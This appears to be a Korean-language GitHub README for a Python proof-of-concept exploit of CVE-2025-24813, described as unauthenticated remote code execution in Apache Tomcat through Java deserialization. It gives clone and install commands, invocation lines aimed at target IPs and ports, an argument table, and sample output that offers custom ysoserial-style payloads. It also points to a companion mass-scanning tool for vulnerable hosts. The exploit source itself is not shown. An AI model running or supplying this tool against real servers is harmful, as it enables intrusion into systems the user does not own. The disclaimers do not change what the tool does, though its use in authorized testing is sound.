
CVE-2025-24813에 대한 Python 개념 증명 익스플로잇 - 악의적인 Java 객체 역직렬화를 통한 Apache Tomcat(v9.0.0-9.0.98/10.1.0-10.1.34/11.0.0-11.0.2)의 인증되지 않은 원격 코드 실행(RCE). 안전한 탐지 모드와 사용자 정의 페이로드 지원을 포함합니다.
Apache Tomcat 역직렬화 취약점(CVE-2025-24813)에 대한 개념 증명 익스플로잇입니다. 이 도구는 공격자가 Tomcat의 세션 관리에서 안전하지 않은 역직렬화를 어떻게 악용할 수 있는지 보여줍니다.
경고: 이 도구는 승인된 보안 테스트 및 교육 목적으로만 사용해야 합니다. 소유하지 않은 시스템에 대한 무단 사용은 불법입니다.
requestscoloramagit clone https://github.com/mattb709/CVE-2025-24813-PoC.git
cd CVE-2025-24813-PoC
pip install -r requirements.txt
기본 사용법:
python CVE-2025-24813-PoC.py -t 192.168.1.100 -p 8080
고급 옵션:
python CVE-2025-24813-PoC.py \
-t 10.0.0.1 \
-p 8443 \
--protocol https \
--no-verify \
--timeout 15
| 인수 | 설명 | 필수 |
|---|---|---|
-t, --target | 대상 IP 주소 | 예 |
-p, --port | 대상 포트 번호 | 예 |
--protocol | http 또는 https (기본값: http) | 아니오 |
--no-verify | SSL 인증서 확인 비활성화 | 아니오 |
--timeout | 요청 타임아웃(초) (기본값: 10) | 아니오 |
[*] Apache Tomcat CVE-2025-24813 Exploit PoC
[!] WARNING: For authorized testing only. Unauthorized use is illegal.
[*] Targeting http://192.168.1.100:8080
[*] Payload Options:
1. Use default dummy payload (safe, for detection)
2. Enter custom payload (hex-encoded, e.g., from ysoserial)
[?] Enter choice (1 or 2): 1
[*] Using default dummy payload.
[*] Attempting exploit...
[+] Success: Deserialization triggered (HTTP 500). Potential RCE if payload is malicious!
취약한 시스템 대량 스캔용:
🔍 CVE-2025-24813-Scanner - 취약한 Tomcat 호스트 대량 탐지 도구
이 취약점의 영향을 받는 경우:
이 소프트웨어는 MIT 라이선스에 따라 제공됩니다. 작성자는 이 도구의 오용에 대해 책임을 지지 않습니다. 시스템을 테스트하기 전에 항상 적절한 승인을 받으십시오.
MIT 라이선스 - 자세한 내용은 LICENSE 파일을 참조하세요.